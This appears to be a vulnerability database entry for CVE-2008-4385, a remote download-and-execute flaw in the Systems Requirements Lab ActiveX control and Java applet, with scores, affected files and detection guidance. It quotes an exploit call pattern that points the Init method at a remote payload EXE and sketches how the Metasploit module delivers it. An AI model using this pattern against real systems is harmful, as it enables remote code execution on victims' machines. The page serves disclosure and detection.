cbcvebase.
CVE-2008-4385
published 2008-10-14

CVE-2008-4385: Husdawg, LLC Systems Requirements Lab 3, as used by Instant Expert Analysis, allows remote attackers to force the download and execution of arbitrary programs…

PriorityP355critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
37.68%
98.4th percentile
Husdawg, LLC Systems Requirements Lab 3, as used by Instant Expert Analysis, allows remote attackers to force the download and execution of arbitrary programs via by specifiying a malicious website argument to the Init method in (1) a certain ActiveX control (sysreqlab2.cab, sysreqlab.dll, sysreqlabsli.dll, or sysreqlab2.dll) and (2) a certain Java applet in RLApplet.class in sysreqlab2.jar or sysreqlab.jar.

Affected

1 ranges
VendorProductVersion rangeFixed in
systemrequirementslabsystem_requirements_lab

Detection & IOCsextracted from sources · hover to see the quote

filenamesysreqlab2.cab
filenamesysreqlab.dll
filenamesysreqlabsli.dll
filenamesysreqlab2.dll
filenameRLApplet.class
filenamesysreqlab2.jar
filenamesysreqlab.jar
commandInit("<payload_url>/<exe>.exe", "<vname>")
  • Monitor for ActiveX instantiation of sysreqlab2.dll (version 2.30.0.0) in browser processes, specifically calls to the 'Init' method with a remote HTTP URL as the first argument, which triggers download and execution of an arbitrary EXE.
  • Detect HTML pages that instantiate the sysreqlab ActiveX control and invoke the Init method with a remote URL argument pointing to an .exe file — the exploit delivers an EXE payload via 'Content-Type: application/octet-stream'.
  • Look for browser-spawned processes downloading and executing EXE files sourced from a URL passed as the first argument to the ActiveX Init method; the Metasploit module appends a random alpha string as the exe filename (e.g., <random>.exe).
  • Inspect Java applet loads for RLApplet.class within sysreqlab2.jar or sysreqlab.jar; the same unsafe Init method pattern applies to the Java vector.
  • ·The Metasploit module uses randomized spacing (Rex::Text.randomize_space) and random variable/filename strings, so static string signatures on the HTML payload page will have low reliability; focus detection on the ActiveX Init method call pattern and the EXE download behavior instead.
  • ·The SRVHOST may be set to 0.0.0.0, in which case the payload URL is dynamically resolved to the source address of the victim connection — network-based IOCs for the C2 host cannot be statically predetermined.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.